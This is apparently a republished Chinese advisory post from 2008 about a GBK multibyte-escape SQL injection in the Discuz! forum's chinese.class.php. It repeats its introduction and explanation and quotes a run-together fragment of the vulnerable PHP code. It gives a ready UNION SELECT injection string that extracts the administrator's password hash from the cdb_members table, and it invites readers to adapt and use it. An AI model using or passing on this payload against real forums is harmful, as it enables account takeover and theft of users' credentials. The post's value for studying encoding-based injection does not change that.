作者:冰雪封情
Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑
由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误
提交一个 '
转意成 \'
然后转成gbk的,\和'就变成两个字符了
'就可以成功的引入
Discuz!论坛系统是一个采用 PHP 和 MySQL 等其他多种数据库构建的高效论坛解决方案。Discuz! 在代码质量,运行效率,负载能力,安全等级,功能可操控性和权限严密性等方面都在广大用户中有良好的口碑
由于 PHP 对 多字节字符集的支持存在问题,在各种编码相互转换过程中,有可能引发程序溢出和程序错误
提交一个 '
转意成 \'
然后转成gbk的,\和'就变成两个字符了
'就可以成功的引入
<* 参考
http://www.discuz.net/thread-1008182-1-1.html*>
http://www.sebug.net/vulndb/3778/
http://www.topgct.com/2008/08/04/%e5%85%b3%e4%ba%8ediscuz%e5%88%a9%e7%94%a8%e7%a8%8b%e5%ba%8f%e5%a3%b0%e6%98%8e/
测试方法:
[www.sebug.net]
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!
if(defined('IN_DISCUZ')) {exit('Access Denied');}define('CODETABLE_DIR', DISCUZ_ROOT.'./include/tables/');class Chinese {var $table = '';var $iconv_enabled = false;var $unicode_table = array();var $config = array('SourceLang' => '','TargetLang' => '','GBtoUnicode_table' => 'gb-unicode.table','BIG5toUnicode_table' => 'big5-unicode.table',);function Chinese($SourceLang, $TargetLang, $ForceTable = FALSE) {$this->config['SourceLang'] = $this->_lang($SourceLang);$this->config['TargetLang'] = $this->_lang($TargetLang);if(!function_exists(’iconv’) && $this->config['TargetLang'] != ‘BIG5′ && !$ForceTable) {$this->iconv_enabled = true;} else {$this->iconv_enabled = false;$this->OpenTable();}}function _lang($LangCode) {$LangCode = strtoupper($LangCode);if(substr($LangCode, 0, 2) == ‘GB’) {return ‘GBK’;} elseif(substr($LangCode, 0, 3) == ‘BIG’) {return ‘BIG5′;} elseif(substr($LangCode, 0, 3) == ‘UTF’) {return ‘UTF-8′;} elseif(substr($LangCode, 0, 3) == ‘UNI’) {return ‘UNICODE’;}}function _hex2bin($hexdata) {for($i=0; $i < strlen($hexdata); $i += 2) {$bindata .= chr(hexdec(substr($hexdata, $i, 2)));}return $bindata;}chinese.class.php (utf-8不能利用)searchid=22%cf'UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=1/*&do=submit以上各位自己修改去用吧!
SEBUG安全建议:
http://www.discuz.net/thread-1008182-1-1.html
// Sebug.net [ 2008-08-04 ]
上一篇:
发现baidu的在线用户页
下一篇:
以为J8HACK关了,少了娱乐了